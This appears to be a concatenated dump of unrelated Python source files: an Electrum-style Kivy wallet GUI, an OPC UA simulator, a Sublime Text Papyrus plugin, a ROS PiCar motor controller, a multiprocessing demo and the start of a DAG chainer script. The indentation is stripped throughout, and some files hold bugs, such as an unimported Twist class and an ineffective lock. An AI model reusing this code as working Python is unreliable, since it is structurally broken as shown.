if self.network is None or not self.network.is_running():
status = _("Offline")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
if not self.wallet.up_to_date or server_height == 0:
status = _("Synchronizing...")
elif server_lag > 1:
status = _("Server lagging (%d blocks)"%server_lag)
else:
c, u, x = self.wallet.get_balance()
text = self.format_amount(c+x+u)
status = str(text.strip() + ' ' + self.base_unit)
else:
status = _("Disconnected")
n = self.wallet.basename()
self.status = '[size=15dp]%s[/size]\n%s' %(n, status)
#fiat_balance = self.fx.format_amount_and_units(c+u+x) or ''
def get_max_amount(self):
inputs = self.wallet.get_spendable_coins(None, self.electrum_config)
addr = str(self.send_screen.screen.address) or self.wallet.dummy_address()
outputs = [(TYPE_ADDRESS, addr, '!')]
tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config)
amount = tx.output_value()
return format_satoshis_plain(amount, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, is_diff, 0, self.decimal_point(), whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('reddelectrum', message,
app_icon=icon, app_name='reddelectrum')
except ImportError:
Logger.Error('Notification: needs plyer; `sudo pip install plyer`')
def on_pause(self):
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
if self.nfcscanner:
self.nfcscanner.nfc_enable()
# workaround p4a bug:
# show an empty info bubble, to refresh the display
self.show_info_bubble('', duration=0.1, pos=(0,0), width=1, arrow_pos=None)
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, touch):
if label.touched:
label.touched = False
self.qr_dialog(label.name, label.data, True)
else:
label.touched = True
self._clipboard.copy(label.data)
Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))
def set_send(self, address, amount, label, message):
self.send_payment(address, amount=amount, label=label, message=message)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show a error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show a Info Message Bubble.
'''
self.show_error(error, icon='atlas://gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show a Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
ok, txid = self.network.broadcast(tx)
Clock.schedule_once(lambda dt: on_complete(ok, txid))
def broadcast(self, tx, pr=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
if pr:
self.wallet.invoices.set_paid(pr, tx.txid())
self.wallet.invoices.save()
self.update_tab('invoices')
else:
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
@profiler
def amount_dialog(self, screen, show_max):
from uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def protected(self, msg, f, args):
if self.wallet.has_password():
self.password_dialog(msg, f, args)
else:
f(*(args + (None,)))
def delete_wallet(self):
from uix.dialogs.question import Question
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = os.path.basename(self.wallet.storage.path)
self.protected(_("Enter your PIN code to confirm deletion of %s") % basename, self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
dirname = os.path.dirname(wallet_path)
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error("Wallet removed:" + basename)
d = os.listdir(dirname)
name = 'default_wallet'
new_path = os.path.join(dirname, name)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except:
self.show_error("Invalid PIN")
return
label.text = _('Seed') + ':\n' + seed
if passphrase:
label.text += '\n\n' + _('Passphrase') + ': ' + passphrase
def change_password(self, cb):
if self.wallet.has_password():
self.protected(_("Changing PIN code.") + '\n' + _("Enter your current PIN:"), self._change_password, (cb,))
else:
self._change_password(cb, None)
def _change_password(self, cb, old_password):
if self.wallet.has_password():
if old_password is None:
return
try:
self.wallet.check_password(old_password)
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.password_dialog(_('Enter new PIN'), self._change_password2, (cb, old_password,))
def _change_password2(self, cb, old_password, new_password):
self.password_dialog(_('Confirm new PIN'), self._change_password3, (cb, old_password, new_password))
def _change_password3(self, cb, old_password, new_password, confirmed_password):
if new_password == confirmed_password:
self.wallet.update_password(old_password, new_password)
cb()
else:
self.show_error("PIN numbers do not match")
def password_dialog(self, msg, f, args):
def callback(pw):
Clock.schedule_once(lambda _: f(*(args + (pw,))), 0.1)
if self._password_dialog is None:
from uix.dialogs.password_dialog import PasswordDialog
self._password_dialog = PasswordDialog()
self._password_dialog.init(msg, callback)
self._password_dialog.open()
|
opc_ua_machine.py | # from opcua import Server
from .opc_ua_structure import node_definitions, NAMESPACES, construct_node_structure, Server
from .machine_systems_simulation import system_builder, functions_definitions
import threading
import random
import time
class AMServer:
def __init__(self):
self.url = "opc.tcp://0.0.0.0:4840/"
self.server = Server()
self.server.set_endpoint(self.url)
for namespace in NAMESPACES:
self.server.register_namespace(namespace)
self.nodes = node_definitions()
node_structure_server = construct_node_structure(self.nodes, self.server)
self.serving = False
self._running = False
self.process_thread = threading.Thread(target=self.proccess, args=(self,))
self.machine_functions = system_builder(functions_definitions(), node_structure_server)
def _start_process(self):
self._running = True
self.process_thread.start()
def setup_nodes(self):
pass
def start(self):
if self.serving:
return
self._start_process()
self.server.start()
self.serving = True
def stop(self):
if not self.serving:
return
self.server.stop()
self._running = False
self.serving = False
def proccess(self, *args, **kwargs):
while self._running:
time.sleep(0.1)
for system in self.machine_functions:
self.machine_functions[system].process()
if __name__ == '__main__':
Vivi = AMServer()
try:
Vivi.start()
while True:
pass
finally:
Vivi.stop()
|
Plugin.py | # ST2 uses Python 2.6 and ST3 uses Python 3.3.
import sublime, sublime_plugin, re, os, threading, sys, time
PYTHON_VERSION = sys.version_info
if PYTHON_VERSION[0] == 2:
import imp
root, module = os.path.split(os.getcwd())
# Build system
buildPackage = os.path.join(root, "Default", "exec.py")
imp.load_source("BUILD_SYSTEM", buildPackage)
del buildPackage
import BUILD_SYSTEM
elif PYTHON_VERSION[0] >= 3:
import importlib
BUILD_SYSTEM = importlib.import_module("Default.exec")
# ST3's API is ready to be used.
#def plugin_loaded():
# global USER_SETTINGS
# USER_SETTINGS = sublime.load_settings('SublimePapyrus.sublime-settings')
def GetSettings():
settings = sublime.load_settings('SublimePapyrus.sublime-settings')
if settings:
return settings
else:
ShowMessage("Could not load settings...")
return None
def ShowMessage(message):
sublime.status_message("SublimePapyrus - %s" % message)
def SetStatus(view, key, value):
view.set_status(key, value)
def ClearStatus(view, key):
view.erase_status(key)
ERROR_HIGHLIGHT_KEY = "sublime_papyrus_error"
ERROR_HIGHLIGHT_SCOPE = "invalid"
def ClearHighlights(view, key):
view.erase_regions(key)
def ClearLinterHighlights(view):
ClearHighlights(view, ERROR_HIGHLIGHT_KEY)
def HighlightLinter(view, line, column = None, center = True):
Highlight(view, ERROR_HIGHLIGHT_KEY, ERROR_HIGHLIGHT_SCOPE, line, column, center)
def Highlight(view, key, scope, line, column = None, center = True):
if view and line:
regions = view.get_regions(key) #[]
if column: # Highlight a word
point = view.text_point(line-1, column)
regions.append(view.word(sublime.Region(point)))
else: # Highlight a line
point = view.text_point(line-1, 0)
regions.append(view.line(sublime.Region(point)))
if len(regions) > 0:
view.add_regions(key, regions, scope)
settings = GetSettings()
if settings:
if center and settings.get("center_highlighted_line", True):
view.show_at_center(regions[0])
def GetSourcePaths(view):
if not view:
return None
match = re.search("source\.papyrus\.(\w+).*", view.scope_name(0), re.IGNORECASE)
if match:
module = match.group(1)
settings = GetSettings()
if settings:
modules = settings.get("modules", None)
if modules:
moduleSettings = modules.get(module, None)
if moduleSettings:
paths = moduleSettings.get("import", None)
if paths:
fullPath = view.file_name()
if fullPath:
folderPath, fileName = os.path.split(fullPath)
paths.insert(0, folderPath)
return paths
else:
ShowMessage("Could not find import paths for %s." % module.capitalize())
else:
ShowMessage("Could not find settings for %s." % module.capitalize())
else:
ShowMessage("Could not find settings for any modules.")
else:
ShowMessage("SublimePapyrus: Unsupported syntax definition.")
class SublimePapyrusFileSelectionPanelCommand(sublime_plugin.WindowCommand):
def run(self, **args):
items = args["items"]
if items:
self.items = items
settings = GetSettings()
if settings and settings.get("open_script_split_paths", True):
items = []
for path in self.items:
root, file = os.path.split(path)
items.append([file, root])
if PYTHON_VERSION[0] == 2:
self.window.show_quick_panel(items, self.on_select, 0, -1)
elif PYTHON_VERSION[0] >= 3:
self.window.show_quick_panel(items, self.on_select, 0, -1, None)
def on_select(self, index):
if index >= 0:
self.window.open_file(self.items[index])
# Base class that is used in the framework for showing a list of valid arguments and then inserting them.
# Libraries that need this functionality should import at least "sublime", "sublime_plugin", "sys", and this module.
# ST2 requires using the "imp" module to load this module first via the "load_source" function. ST3 can simply use "from SublimePapyrus import SublimePapyrus".
# Classes implementing this functionality need to inherit the "PapyrusShowSuggestionsCommand" class and override the "get_items" method.
# "get_items" should return a dictionary where the keys are the descriptions shown to the user and the values are what is inserted into the buffer.
class SublimePapyrusShowSuggestionsCommand(sublime_plugin.TextCommand):
def run(self, edit, **args):
selections = self.view.sel()
if selections != None and len(selections) == 1:
region = selections[0]
self.argument = region
items = self.get_items()
if items != None:
sortedKeysAndValues = sorted(zip(list(items.keys()), list(items.values())))
sortedKeys = [[key, str(value)] for (key, value) in sortedKeysAndValues]
sortedValues = [value for (key, value) in sortedKeysAndValues]
self.items = sortedKeys
self.values = sortedValues
if PYTHON_VERSION[0] == 2:
self.view.window().show_quick_panel(self.items, self.on_select, 0, -1)
else:
self.view.window().show_quick_panel(self.items, self.on_select, 0, -1, None)
def get_items(self, **args):
return None
def on_select(self, index):
if index >= 0:
value = str(self.values[index])
if value.isdigit() or value != "":
args = {"region_start": self.argument.a, "region_end": self.argument.b, "replacement": value}
else:
args = {"region_start": self.argument.a, "region_end": self.argument.b, "replacement": str(self.items[index][0])}
self.view.run_command("sublime_papyrus_insert_suggestion", args)
# Inserts the value chosen in the class that inherits "PapyrusShowSuggestionsCommand".
class SublimePapyrusInsertSuggestionCommand(sublime_plugin.TextCommand):
def run(self, edit, **args):
region = sublime.Region(args["region_start"], args["region_end"])
self.view.erase(edit, region)
if args["replacement"].isdigit():
self.view.insert(edit, args["region_start"], args["replacement"])
else:
self.view.insert(edit, args["region_start"], "\"" + args["replacement"] + "\"")
class SublimePapyrusClearErrorHighlightsCommand(sublime_plugin.TextCommand):
def run(self, edit, **args):
if self.view:
ClearLinterHighlights(self.view)
# Open a script based on input
class SublimePapyrusOpenScriptCommand(sublime_plugin.WindowCommand):
def run(self):
text = ""
self.view = self.window.active_view()
if self.view:
text = self.view.substr(self.view.sel()[0])
self.window.show_input_panel("Open script:", text, self.on_done, None, None)
def on_done(self, text):
if not text:
return
if PYTHON_VERSION[0] == 2:
self.get_matching_files(text)
elif PYTHON_VERSION[0] >= 3:
thread = threading.Thread(target=self.get_matching_files, args=(text,))
thread.start()
def get_matching_files(self, text, paths = None):
if not paths:
paths = GetSourcePaths(self.view)
if paths:
ShowMessage("Looking for matches...")
candidates = []
if text == "*":
text = ""
text = text.lower()
for path in paths:
for root, dirs, files in os.walk(path):
for file in files:
if text in file.lower():
fullPath = os.path.join(root, file)
if not fullPath in candidates:
candidates.append(fullPath)
break
i = len(candidates)
if i == 1:
ShowMessage("Found 1 match.")
self.window.open_file(candidates[0])
elif i > 1:
ShowMessage("Found %d matches." % i)
self.window.run_command("sublime_papyrus_file_selection_panel", {"items": candidates})
else:
ShowMessage("Found no matches.")
else:
settings = GetSettings()
modules = settings.get("modules", None)
if modules:
moduleTitles = []
self.modulePaths = []
for ident, moduleSettings in modules.items():
paths = moduleSettings.get("import", None)
if paths:
self.modulePaths.append(paths)
moduleTitles.append(moduleSettings.get("title", ident.capitalize()))
if moduleTitles:
self.text = text
self.window.show_quick_panel(moduleTitles, self.module_paths)
def module_paths(self, index):
if index >= 0 and index < len(self.modulePaths):
self.get_matching_files(self.text, self.modulePaths[index])
else:
return
# Build system
class SublimePapyrusCompileScriptCommand(sublime_plugin.WindowCommand):
def run(self, **args):
file = args["cmd"]
filePath, fileName = os.path.split(file)
regex = args["file_regex"]
module = args["module"]
batch = args.get("batch", False)
settings = GetSettings()
if settings:
modules = settings.get("modules", None)
if modules:
moduleSettings = modules.get(module, None)
if moduleSettings:
compiler = moduleSettings.get("compiler", None)
if not compiler or compiler == "":
return ShowMessage("The compiler path setting is undefined or invalid.")
flags = moduleSettings.get("flags", None)
if not flags or flags == "":
return ShowMessage("The flags name setting is undefined or invalid.")
output = moduleSettings.get("output", "")
if not output or output == "":
output, _ = os.path.split(filePath)
if output[-2:] == ":\\":
output = output + "\\"
imports = moduleSettings.get("import", None)
if imports:
if (PYTHON_VERSION[0] == 2 and isinstance(imports, list) and all(isinstance(k, basestring) for k in imports) and all(k != "" for k in imports)) or (PYTHON_VERSION[0] >= 3 and isinstance(imports, list) and all(isinstance(k, str) for k in imports) and all(k != "" for k in imports)):
if not batch:
if not filePath in imports:
imports.insert(0, filePath)
else:
t = filePath.lower()
if not all(t != k.lower() for k in imports) and settings.get("batch_compilation_warning", True) and not sublime.ok_cancel_dialog("Are you sure you want to batch compile all script sources in \"%s\"?\n\nThis folder is one of the import folders and may contain script sources that are a part of the base game. Compiling said script sources could lead to unintended behavior if they have been modified." % filePath):
return
for path in imports:
if not os.path.isdir(path):
return ShowMessage("The import path '%s' does not exist on the filesystem." % path)
imports = ";".join(imports)
else:
return ShowMessage("The import path(s) setting has to be a list of strings.")
else:
return ShowMessage("The import path(s) setting is undefined.")
arguments = moduleSettings.get("arguments", None)
if arguments:
if isinstance(arguments, list) and all(isinstance(k, str) for k in arguments):
temp = []
for k in arguments:
if k[:1] == "-":
temp.append(k)
else:
temp.append("-%s" % k)
arguments = temp
else:
return ShowMessage("The arguments setting has to be a list of strings.")
buildArguments = args.get("arguments", None)
if buildArguments:
if isinstance(buildArguments, list) and all(isinstance(k, str) for k in buildArguments):
if arguments and isinstance(arguments, list):
for k in buildArguments:
if k[:1] != "-":
k = "-%s" % k
if k not in arguments:
arguments.append(k)
elif not arguments:
arguments = []
for k in buildArguments:
if k[:1] == "-":
arguments.append(k)
else:
arguments.append("-%s" % k)
else:
return ShowMessage("The build system's arguments setting has to be a list of strings.")
if arguments and isinstance(arguments, list):
arguments = " ".join(arguments)
if not arguments:
arguments = ""
if not batch:
args = {"cmd": "\"%s\" \"%s\" -i=\"%s\" -o=\"%s\" -f=\"%s\" %s" % (compiler, fileName, imports, output, flags, arguments), "file_regex": regex}
else:
if filePath[-1:] == "\\":
filePath = filePath[:-1]
args = {"cmd": "\"%s\" \"%s\" -i=\"%s\" -o=\"%s\" -f=\"%s\" %s %s" % (compiler, filePath, imports, output, flags, batch, arguments), "file_regex": regex}
self.window.run_command("exec", args)
# Make completions
def MakeFunctionCompletion(stat, sem, calling = True, script = "", precededByKeyword = False, parameters = True):
tabTrigger = stat.data.name.lower()
if script:
script = " (%s)" % script
description = ""
if stat.data.type:
if stat.data.array:
description = "%s[] func.%s" % (stat.data.typeIdentifier, script)
else:
description = "%s func.%s" % (stat.data.typeIdentifier, script)
else:
description = "func.%s" % script
if calling:
content = ""
if stat.data.parameters:
if parameters:
i = 1
for param in stat.data.parameters:
if param.array:
if param.expression:
content = content + "${%d:%s[] %s = %s}, " % (i, param.type, param.identifier, sem.GetLiteral(param.expression, True))
else:
content = content + "${%d:%s[] %s}, " % (i, param.typeIdentifier, param.identifier)
else:
if param.expression:
content = content + "${%d:%s %s = %s}, " % (i, param.typeIdentifier, param.identifier, sem.GetLiteral(param.expression, True))
else:
content = content + "${%d:%s %s}, " % (i, param.typeIdentifier, param.identifier)
i += 1
content = "%s(%s)" % (stat.data.identifier, content[:-2])
else:
content = "%s(${1})" % stat.data.identifier
else:
content = "%s()" % stat.data.identifier
return (tabTrigger + "\t" + description.lower(), content,)
else:
content = ""
if stat.data.parameters:
i = 1
for param in stat.data.parameters:
if param.array:
if param.expression:
content = content + "${%d:%s[] %s = %s}, " % (i, param.typeIdentifier, param.identifier, sem.GetLiteral(param.expression, True))
else:
content = content + "${%d:%s[] %s}, " % (i, param.typeIdentifier, param.identifier)
else:
if param.expression:
content = content + "${%d:%s %s = %s}, " % (i, param.typeIdentifier, param.identifier, sem.GetLiteral(param.expression, True))
else:
content = content + "${%d:%s %s}, " % (i, param.typeIdentifier, param.identifier)
i += 1
if len(content) > 0:
content = content[:-2]
if precededByKeyword:
content = "%s(%s)\n\t${0}\nEndFunction" % (stat.data.identifier, content)
else:
typ = ""
if stat.data.type:
if stat.data.array:
typ = "%s[] " % stat.data.typeIdentifier
else:
typ = "%s " % stat.data.typeIdentifier
content = "%sFunction %s(%s)\n\t${0}\nEndFunction" % (typ, stat.data.identifier, content)
return (tabTrigger + "\t" + description.lower(), content,)
def MakeEventCompletion(stat, sem, calling = True, script = "", precededByKeyword = False, parameters = True):
tabTrigger = stat.data.name.lower()
if script:
script = " (%s)" % script
description = "event%s" % script
if calling:
content = ""
if stat.data.parameters:
if parameters:
i = 1
for param in stat.data.parameters:
if param.array:
if param.expression:
content = content + "${%d:%s[] %s = %s}, " % (i, param.typeIdentifier, param.identifier, sem.GetLiteral(param.expression, True))
else:
content = content + "${%d:%s[] %s}, " % (i, param.typeIdentifier, param.identifier)
else:
if param.expression:
content = content + "${%d:%s %s = %s}, " % (i, param.typeIdentifier, param.identifier, sem.GetLiteral(param.expression, True))
else:
content = content + "${%d:%s %s}, " % (i, param.typeIdentifier, param.identifier)
i += 1
content = "%s(%s)" % (stat.data.identifier, content[:-2])
else:
content = "%s(${1})" % stat.data.identifier
else:
content = "%s()" % stat.data.identifier
return (tabTrigger + "\t" + description.lower(), content,)
else:
content = ""
if stat.data.parameters:
i = 1
for param in stat.data.parameters:
if param.array:
if param.expression:
content = content + "${%d:%s[] %s = %s}, " % (i, param.typeIdentifier, param.identifier, sem.GetLiteral(param.expression, True))
else:
content = content + "${%d:%s[] %s}, " % (i, param.typeIdentifier, param.identifier)
else:
if param.expression:
content = content + "${%d:%s %s = %s}, " % (i, param.typeIdentifier, param.identifier, sem.GetLiteral(param.expression, True))
else:
content = content + "${%d:%s %s}, " % (i, param.typeIdentifier, param.identifier)
i += 1
if len(content) > 0:
content = content[:-2]
if precededByKeyword:
content = "%s(%s)\n\t${0}\nEndEvent" % (stat.data.identifier, content)
else:
content = "Event %s(%s)\n\t${0}\nEndEvent" % (stat.data.identifier, content)
return (tabTrigger + "\t" + description.lower(), content,)
def MakePropertyCompletion(stat, script = ""):
tabTrigger = stat.data.name.lower()
description = ""
if script:
script = " (%s)" % script
if stat.data.array:
description = "%s[] prop.%s" % (stat.data.typeIdentifier, script)
else:
description = "%s prop.%s" % (stat.data.typeIdentifier, script)
content = stat.data.identifier
return (tabTrigger + "\t" + description.lower(), content,)
def MakeVariableCompletion(stat):
tabTrigger = stat.data.name.lower()
description = ""
if stat.data.array:
description = "%s[] var." % (stat.data.typeIdentifier)
else:
description = "%s var." % (stat.data.typeIdentifier)
content = stat.data.identifier
return (tabTrigger + "\t" + description.lower(), content,)
def MakeParameterCompletion(stat):
tabTrigger = stat.data.name.lower()
description = ""
if stat.data.array:
description = "%s[] param." % (stat.data.typeIdentifier)
else:
description = "%s param." % (stat.data.typeIdentifier)
content = stat.data.identifier
return (tabTrigger + "\t" + description.lower(), content,)
# Checks the build result for errors and, depending on the settings, highlights lines that caused errors and/or hides the build results when there are no errors.
class ExecCommand(BUILD_SYSTEM.ExecCommand):
def finish(self, proc):
view = sublime.active_window().active_view()
if view:
if "source.papyrus" in view.scope_name(0):
view.erase_regions(ERROR_HIGHLIGHT_KEY)
userSettings = GetSettings()
if userSettings:
if userSettings.get('highlight_build_errors', True):
output = self.output_view.substr(sublime.Region(0, self.output_view.size()))
if output:
pattern = self.output_view.settings().get("result_file_regex")
if pattern:
errors = self.GetErrors(output, pattern)
if errors:
regions = self.GetRegions(view, errors)
if regions:
view.add_regions(ERROR_HIGHLIGHT_KEY, regions, ERROR_HIGHLIGHT_SCOPE)
if userSettings.get("center_highlighted_line", True):
view.show_at_center(regions[0])
elif userSettings.get('hide_successful_build_results', False):
self.window.run_command("hide_panel", {"panel": "output.exec"})
def GetErrors(self, output, pattern):
lines = output.rstrip().split('\n')
matches = []
regex = re.compile(pattern)
for line in lines:
match = regex.findall(line)
if len(match) > 0:
matches.append(match)
if len(matches) > 0:
return matches
else:
return None
def GetRegions(self, view, errors):
regions = []
for error in errors:
region = view.line(sublime.Region(view.text_point(int(error[0][1]) - 1, 0)))
regions.append(region)
del region
if len(regions) > 0:
return regions
else:
return None |
controller.py | #!/usr/bin/env python3
import rospy
import threading
import time
import math
import atexit
from drivers import PCA9685
from drivers import TB6612
from components import Servo, Throttle
from ackermann_msgs.msg import AckermannDriveStamped
from ackermann_msgs.msg import AckermannDrive
from dynamic_reconfigure.server import Server as DynamicReconfigureServer
from picar_bringup.cfg import PicarConfig
NODE_NAME = 'picar_controller'
TYPE_ACKERMANN = 'ackermann_drive'
GPIO_MOTOR_ROT_A = 17
GPIO_MOTOR_ROT_B = 27
CHN_PWM_DIR = 0
CHN_PWM_A = 4
CHN_PWM_B = 5
DIR_MIN = 30
DIR_MAX = 150
class PicarNode(object):
msg = AckermannDriveStamped()
freq = 50
is_running = True
def __init__(self):
atexit.register(self.emergency)
# Initialize Direction
self.servo = Servo.Servo(CHN_PWM_DIR)
self.servo.debug = False
self.servo.min_degree_value = DIR_MIN
self.servo.max_degree_value = DIR_MAX
self.servo.offset = 15
# Initialize engine
self.throttle_a = Throttle.Throttle(CHN_PWM_A)
self.throttle_a.debug = False
self.throttle_b = Throttle.Throttle(CHN_PWM_B)
self.throttle_b.debug = False
self.motorA = TB6612.Motor(GPIO_MOTOR_ROT_A, pwm=self.throttle_a.write, offset=False)
self.motorB = TB6612.Motor(GPIO_MOTOR_ROT_B, pwm=self.throttle_b.write, offset=False)
# Set origin
self.servo.default()
self.motorA.speed = 0
self.motorB.speed = 0
# Initialize the node and name it.
rospy.init_node(NODE_NAME)
# Load Parameters.
self.arg_wheel_diameter = float(rospy.get_param('~wheel_diameter', 0.067))
self.arg_motor_speed_max = int(rospy.get_param('~motor_speed_max', 195))
if self.arg_wheel_diameter <= 0:
rospy.logwarn("Weel diameter can be < 0 meter !")
self.arg_wheel_diameter = 0.067
if self.arg_motor_speed_max <= 0:
rospy.logwarn("Motor max speed can be < 0 meter !")
self.arg_motor_speed_max = 200
# convert max RPM to RPS (x/60), apply RPS to perimeter, to ratio for per cent.
self.motor_ratio = ((float(self.arg_motor_speed_max)/60)*self.arg_wheel_diameter)/100
rospy.loginfo("Motor ratio : %f (wheel %f, motor speed %d)", self.motor_ratio, self.arg_wheel_diameter, self.arg_motor_speed_max)
self.ackermann_cmd_topic = rospy.get_param('~ackermann_cmd_topic', '/ackermann_cmd')
self.message_type = rospy.get_param('~message_type', 'ackermann_drive_stamped') # ackermann_drive or ackermann_drive_stamped
self.srv = DynamicReconfigureServer(PicarConfig, self.dynrec_callback)
# Create topics (publisher & subscriber).
rospy.Subscriber(self.ackermann_cmd_topic, AckermannDriveStamped, self.cmd_callback, queue_size=1)
# Start main loop
self.thread = threading.Thread(target=self.__loop, args=())
self.thread.start()
# loop for process.
rospy.loginfo("Node '%s' started.\nListening to %s", NODE_NAME, self.ackermann_cmd_topic)
try:
rospy.spin()
except KeyboardInterrupt:
self.emergency()
def __del__(self):
self.emergency()
def __loop(self):
while(self.is_running):
# Manage Direction
steering_angle = self.msg.drive.steering_angle
if(steering_angle > 0.1 or steering_angle < -0.1):
servo_angle = int(90 - 20 * steering_angle)
rospy.loginfo("steering : %f \servo : %f", steering_angle, servo_angle)
self.servo.write(servo_angle)
else:
self.servo.default()
## Manage Speed
# Direction of operation
cmd_speed = self.msg.drive.speed
if (cmd_speed > 0):
self.motorA.forward()
self.motorB.forward()
elif (cmd_speed < 0):
self.motorA.backward()
self.motorB.backward()
# Limit to speed to motor
#TODO Add accel concept.
motor_speed = math.fabs(cmd_speed)/self.motor_ratio
if (motor_speed > 100):
motor_speed = 100
# Set Motor speed
self.motorA.speed = motor_speed
self.motorB.speed = motor_speed
## Sleep
time.sleep(1/self.freq)
def cmd_callback(self, msg):
self.msg = msg
def dynrec_callback(self, config, level):
rospy.loginfo("""Reconfigure Request: {steering_offset}""".format(**config))
self.servo.offset = config.steering_offset
return config
def emergency(self):
self.vel = Twist()
self.motorA.speed = 0
self.motorB.speed = 0
self.is_running = False
# Main function.
if __name__ == '__main__':
# Go to class functions that do all the heavy lifting. Do error checking.
try:
ne = PicarNode()
except rospy.ROSInterruptException: pass
|
MPT.py | import time
import multiprocessing
from rich import print as rprint
lock = multiprocessing.Lock()
count = 0
def one(count):
while True:
time.sleep(1)
count += 1
rprint(f"[yellow] Msg from child process [red]1 : [blue]{count}")
if count == 5:
lock.acquire()
for i in range(5):
time.sleep(1)
count+=1
lock.release()
def two(count):
while True:
time.sleep(1)
count += 1
rprint(f"[yellow] Msg from child process [red]2 : [red]{count}")
if __name__ == "__main__":
p1 = multiprocessing.Process(target = one, args = (count,)).start()
p2 = multiprocessing.Process(target = two, args = (count,)).start() |
dag_chainer.py | #!/usr/bin/env python
CONSTANT_MATCH_SCORE=None
MAX_MATCH_SCORE=50.0
import math
from subprocess import Popen, PIPE
import os
op = os.path
PATH = op.dirname(op.abspath(__file__))
import sys
sys.path.insert(0, PATH)
from dagtools import DagLine
import collections
import operator
#try:
# from processing import Process, Pipe as mPipe
#except ImportError:
# from multiprocessing import Process, Pipe as mPipe
def scoringF(evalue, constant_match=CONSTANT_MATCH_SCORE, max_match=MAX_MATCH_SCORE):
if not constant_match is None:
return constant_match
matchScore = 10 * -math.log10(evalue);
matchScore = int(matchScore +.5) / 10
return max_match if matchScore > max_match else matchScore
def get_dag_line(fh):
line = fh.readline()
if not line: return None, None
if line[0] == "#":
get_dag_line.header = parse_pyheader(line, asstring=True)
line = fh.readline()
return DagLine(line), get_dag_line.header
# `get_dag_line.header` is sort of a hack to save the last seen header.
# so we know every dagline that follows belong to this group.
get_dag_line.header = None
JS="^" # magic separator. (J)oin (S)tring
def parse_pyheader(header, asstring=False):
cols = ('id', 'dagscore', 'a_seqid', 'b_seqid', 'dir', 'ngenes')
#1 17397.0 athaliana_1 athaliana_1 f 432
if asstring:
header = header.replace(JS, "!!")
li = header[1:-1].split('\t')
if asstring:
return JS.join(li)
